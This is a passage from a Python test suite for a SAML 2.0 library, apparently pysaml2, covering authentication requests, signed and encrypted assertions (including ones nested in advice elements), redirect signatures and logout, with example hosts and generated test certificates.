assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "true"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
def test_create_auth_request_vo(self):
assert list(self.client.config.vorg.keys()) == [
"urn:mace:example.com:it:tek"]
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso",
"urn:mace:example.com:it:tek", # vo
nameid_format=NAMEID_FORMAT_PERSISTENT,
message_id="666")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.id == "666"
assert ar.assertion_consumer_service_url == "http://lingon.catalogix" \
".se:8087/"
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
assert nid_policy.sp_name_qualifier == "urn:mace:example.com:it:tek"
def test_sign_auth_request_0(self):
req_id, areq = self.client.create_authn_request(
"http://www.example.com/sso", sign=True, message_id="id1")
ar_str = "%s" % areq
ar = samlp.authn_request_from_string(ar_str)
assert ar
assert ar.signature
assert ar.signature.signature_value
signed_info = ar.signature.signed_info
assert len(signed_info.reference) == 1
assert signed_info.reference[0].uri == "#id1"
assert signed_info.reference[0].digest_value
try:
assert self.client.sec.correctly_signed_authn_request(
ar_str, self.client.config.xmlsec_binary,
self.client.config.metadata)
except Exception: # missing certificate
self.client.sec.verify_signature(ar_str, node_name=class_name(ar))
def test_create_logout_request(self):
req_id, req = self.client.create_logout_request(
"http://localhost:8088/slo", "urn:mace:example.com:saml:roland:idp",
name_id=nid, reason="Tired", expire=in_a_while(minutes=15),
session_indexes=["_foo"])
assert req.destination == "http://localhost:8088/slo"
assert req.reason == "Tired"
assert req.version == "2.0"
assert req.name_id == nid
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
assert req.session_index == [SessionIndex("_foo")]
def test_response_1(self):
IDP = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id_policy=nameid_policy,
sign_response=True,
userid="<EMAIL>",
authn=AUTHN)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
assert authn_response is not None
assert authn_response.issuer() == IDP
assert authn_response.response.assertion[0].issuer.text == IDP
session_info = authn_response.session_info()
assert session_info["ava"] == {'mail': ['<EMAIL>'],
'givenName': ['Derek'],
'sn': ['Jeter'],
'title': ["The man"]}
assert session_info["issuer"] == IDP
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
assert "session_index" in session_info
# One person in the cache
assert len(self.client.users.subjects()) == 1
subject_id = self.client.users.subjects()[0]
# The information I have about the subject comes from one source
assert self.client.users.issuers_of_info(subject_id) == [IDP]
# --- authenticate another person
ava = {"givenName": ["Alfonson"], "sn": ["Soriano"],
"mail": ["<EMAIL>"], "title": ["outfielder"]}
resp_str = "%s" % self.server.create_authn_response(
identity=ava,
in_response_to="id2",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
sign_response=True,
name_id_policy=nameid_policy,
userid="<EMAIL>",
authn=AUTHN)
resp_str = encode_fn(resp_str.encode())
self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id2": "http://foo.example.com/service"})
# Two persons in the cache
assert len(self.client.users.subjects()) == 2
issuers = [self.client.users.issuers_of_info(s) for s in
self.client.users.subjects()]
# The information I have about the subjects comes from the same source
assert issuers == [[IDP], [IDP]]
def test_response_2(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_3(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_4(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_5(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_6(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_assertion_str, cert_key_assertion_str = generate_cert()
cert_assertion = \
{
"cert": cert_assertion_str,
"key": cert_key_assertion_str
}
cert_advice_str, cert_key_advice_str = generate_cert()
cert_advice = \
{
"cert": cert_advice_str,
"key": cert_key_advice_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_assertion_str,
encrypt_cert_advice=cert_advice_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"},
{"id1": [cert_assertion, cert_advice]})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_7(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_8(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def setup_verify_authn_response(self):
idp = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
ava_verify = {'mail': ['<EMAIL>'], 'givenName': ['Derek'],
'sn': ['Jeter'], 'title': ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
return idp, ava, ava_verify, nameid_policy
def verify_authn_response(self, idp, authn_response, _client, ava_verify):
assert authn_response is not None
assert authn_response.issuer() == idp
assert authn_response.assertion.issuer.text == idp
session_info = authn_response.session_info()
assert session_info["ava"] == ava_verify
assert session_info["issuer"] == idp
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
# One person in the cache
assert len(_client.users.subjects()) == 1
subject_id = _client.users.subjects()[0]
# The information I have about the subject comes from one source
assert _client.users.issuers_of_info(subject_id) == [idp]
def test_init_values(self):
entityid = self.client.config.entityid
assert entityid == "urn:mace:example.com:saml:roland:sp"
location = self.client._sso_location()
assert location == 'http://localhost:8088/sso'
my_name = self.client._my_name()
assert my_name == "urn:mace:example.com:saml:roland:sp"
def test_sign_then_encrypt_assertion(self):
        # Begin on the IdP's side
_sec = self.server.sec
assertion = s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=factory(
saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
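        # Sign the assertion with the test key, wrap it in a response and encrypt it
        # for the SP; the client-side code further down decrypts it and verifies the
        # signature before accepting the assertion.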
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=full_path("test.key"),
node_id=assertion.id)
# Create an Assertion instance from the signed assertion
_ass = saml.assertion_from_string(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
assertion=_ass
)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part())
seresp = samlp.response_from_string(enctext)
# Now over to the client side
_csec = self.client.sec
if seresp.encrypted_assertion:
decr_text = _csec.decrypt(enctext)
seresp = samlp.response_from_string(decr_text)
resp_ass = []
sign_cert_file = full_path("test.pem")
for enc_ass in seresp.encrypted_assertion:
assers = extension_elements_to_elements(
enc_ass.extension_elements, [saml, samlp])
for ass in assers:
if ass.signature:
if not _csec.verify_signature("%s" % ass,
sign_cert_file,
node_name=class_name(
ass)):
continue
resp_ass.append(ass)
seresp.assertion = resp_ass
seresp.encrypted_assertion = None
assert seresp.assertion
def test_sign_then_encrypt_assertion2(self):
        # Begin on the IdP's side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
name_id=factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion']
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=self.client.sec.key_file,
node_id=assertion.id)
sigass = rm_xmltag(sigass)
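        # Build a response holding an empty EncryptedAssertion placeholder; the signed
        # assertion is spliced in as raw XML below and the element is then encrypted.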
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
encrypted_assertion=EncryptedAssertion()
)
xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
enctext = _sec.crypto.encrypt_assertion(xmldoc,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
        # Explicitly allow unsigned responses for this and the following two tests
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.ava == {'givenName': ['Derek'], 'sn': ['Jeter']}
def test_sign_then_encrypt_assertion_advice_1(self):
        # Begin on the IdP's side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
subject_confirmation_specs = {
'recipient': "http://lingon.catalogix.se:8087/",
'in_response_to': "_012345",
'subject_confirmation_method': saml.SCM_BEARER
}
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
name_id=name_id,
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion'])
a_asser = Assertion({"uid": "test01", "email": "<EMAIL>"})
a_assertion = a_asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion.signature = sigver.pre_signature_part(
a_assertion.id, _sec.my_cert, 1)
assertion.advice = Advice()
assertion.advice.encrypted_assertion = []
assertion.advice.encrypted_assertion.append(EncryptedAssertion())
assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion.append(assertion)
response = _sec.sign_statement("%s" % response, class_name(a_assertion),
key_file=self.client.sec.key_file,
node_id=a_assertion.id)
# xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
# xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'sn': ['Jeter'], 'givenName': ['Derek'], 'uid': ['test01'],
'email': ['<EMAIL>']}
def test_sign_then_encrypt_assertion_advice_2(self):
        # Begin on the IdP's side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser_1 = Assertion({"givenName": "Derek"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
assertion_1 = asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
asser_2 = Assertion({"sn": "Jeter"})
assertion_2 = asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_1 = Assertion({"uid": "test01"})
a_assertion_1 = a_asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_2 = Assertion({"email": "<EMAIL>"})
a_assertion_2 = a_asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_3 = Assertion({"street": "street"})
a_assertion_3 = a_asser_3.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_4 = Assertion({"title": "title"})
a_assertion_4 = a_asser_4.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion_1.signature = sigver.pre_signature_part(
a_assertion_1.id, _sec.my_cert, 1)
a_assertion_2.signature = sigver.pre_signature_part(
a_assertion_2.id, _sec.my_cert, 1)
a_assertion_3.signature = sigver.pre_signature_part(
a_assertion_3.id, _sec.my_cert, 1)
a_assertion_4.signature = sigver.pre_signature_part(
a_assertion_4.id, _sec.my_cert, 1)
assertion_1.signature = sigver.pre_signature_part(assertion_1.id,
_sec.my_cert, 1)
assertion_2.signature = sigver.pre_signature_part(assertion_2.id,
_sec.my_cert, 1)
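        # The response is assembled in stages: a_assertion_1/2 are signed and encrypted
        # inside assertion_1's Advice (alternating key pairs), assertion_1 itself is
        # signed and encrypted, then assertion_2 is added with a_assertion_3/4 handled
        # the same way before the outer assertion is signed.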
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion = assertion_1
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_1)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_1._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_1),
key_file=self.server.sec.key_file,
node_id=a_assertion_1.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_2)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_2._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_2),
key_file=self.server.sec.key_file,
node_id=a_assertion_2.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
assertion_tag = response.assertion._to_element_tree().tag
response = pre_encrypt_assertion(response)
response = \
response.get_xml_string_with_self_contained_assertion_within_encrypted_assertion(
assertion_tag)
response = _sec.sign_statement("%s" % response, class_name(assertion_1),
key_file=self.server.sec.key_file,
node_id=assertion_1.id)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
response = samlp.response_from_string(enctext)
response.assertion = assertion_2
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_3)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_3._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_3),
key_file=self.server.sec.key_file,
node_id=a_assertion_3.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_4)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_4._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_4),
key_file=self.server.sec.key_file,
node_id=a_assertion_4.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response = _sec.sign_statement("%s" % response,
class_name(response.assertion[0]),
key_file=self.server.sec.key_file,
node_id=response.assertion[0].id)
response = samlp.response_from_string(response)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(str(response).encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'street': ['street'], 'uid': ['test01'], 'title': ['title'],
'givenName': ['Derek'], 'email':
['<EMAIL>'], 'sn': ['Jeter']}
def test_signed_redirect(self):
        # Revert the configuration change so unsigned responses are disallowed again
self.client.want_response_signed = True
msg_str = "%s" % self.client.create_authn_request(
"http://localhost:8088/sso", message_id="id1")[1]
info = self.client.apply_binding(
BINDING_HTTP_REDIRECT, msg_str, destination="",
relay_state="relay2", sigalg=SIG_RSA_SHA256)
loc = info["headers"][0][1]
qs = parse_qs(loc[1:])
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
self.client.sec.sec_backend)
res = self.server.parse_authn_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_signed_redirect(self):
conf = config.SPConfig()
conf.load_file("sp_slo_redirect_conf")
client = Saml2Client(conf)
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
client.users.add_information_about_person(session_info)
entity_ids = client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = client.do_logout(nid, entity_ids, "Tired", in_a_while(minutes=5),
sign=True,
expected_binding=BINDING_HTTP_REDIRECT)
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_REDIRECT
loc = info["headers"][0][1]
_, _, _, _, qs, _ = urlparse(loc)
qs = parse_qs(qs)
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
client.sec.sec_backend)
res = self.server.parse_logout_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_post(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
def test_do_logout_session_expired(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": a_while_ago(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
